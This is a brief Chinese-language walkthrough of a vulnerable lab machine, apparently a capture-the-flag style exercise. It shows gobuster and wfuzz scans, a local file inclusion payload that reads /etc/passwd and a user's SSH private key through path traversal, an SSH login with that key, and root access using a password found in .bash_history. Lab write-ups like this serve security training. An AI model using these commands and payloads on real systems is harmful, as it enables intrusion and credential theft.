1.安装并开启靶机
2.获取靶机IP
将靶机和Kali都设置为NAT模式
3.访问靶机地址
4.扫描目录和端口
gobuster dir -u http://192.168.40.147 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html
5.访问敏感文件
提示缺少GET参数
爆破参数
wfuzz -u "http://192.168.40.147/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80
尝试读取passwd文件:http://192.168.40.147/test.php?file=/etc/passwd
尝试包含/home/qiu目录下默认保存的ssh密钥文件,通过前面扫描端口知道开了ssh,
我们需要知道ssh默认存私钥的目录:/home/user/.ssh/id_rsa
http://192.168.40.147/test.php?file=../../../../../../../../../home/qiu/.ssh/id_rsa
将私钥保存到Kali中,用私钥登录
chmod 400 id_rsa
ssh qiu@192.168.40.147 -i id_rsa
6.提权
查看用户qiu家目录下的.bash_history文件,找到密码:remarkablyawesomE
sudo su
)
